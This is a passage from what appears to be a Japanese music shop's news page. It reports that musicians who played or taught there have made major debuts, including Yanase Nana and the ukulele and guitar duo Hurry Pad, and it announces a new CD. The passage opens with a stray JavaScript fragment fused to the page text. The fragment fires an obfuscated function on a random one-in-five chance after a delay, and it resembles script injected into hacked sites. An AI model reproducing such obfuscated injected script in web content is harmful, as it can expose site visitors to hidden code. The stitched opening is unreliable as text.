andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200806大きく羽ばたいて!

※集酉楽サカタニでライブや教室をしてくださっているミュージシャンが、メジャーデビューし各界で注目を集めています。
○昨年9月9日に当店でライブを行った「やなせ なな」さんは、若い心のゆらぎを透明感のある声で表現するシンガーソングライター。「七夕」という曲が、8月発売のニンテンドーDS用ソフト「東京魔人学園剣風帖」のエンディングテーマに使われることが決定しました。
○また当店で定期的にウクレレ教室の指導をしてくださっている前田大輔さんと、ギターの清水英之さんのデュオ「フラリーパッド」の「サマー・シュプール」という曲がSK-ⅡのCM曲としてテレビで流れており、まもなくANA国際線の機中でも聴くことができるそうです。5月14日にはCDアルバム「京風」も発売され、音楽界に京都の扇風を巻き起こしています。
ともにさわやかな若者たちでありながら実力派。当店でのご縁を喜びながら、大きく世界へ羽ばたかれることを期待して、皆さんも応援してあげてください。

○沙羅・佐々木ゆか(ボーカル・ピアノ)清水ひさえ(二胡)のお二人が、初めてCDを発売されます。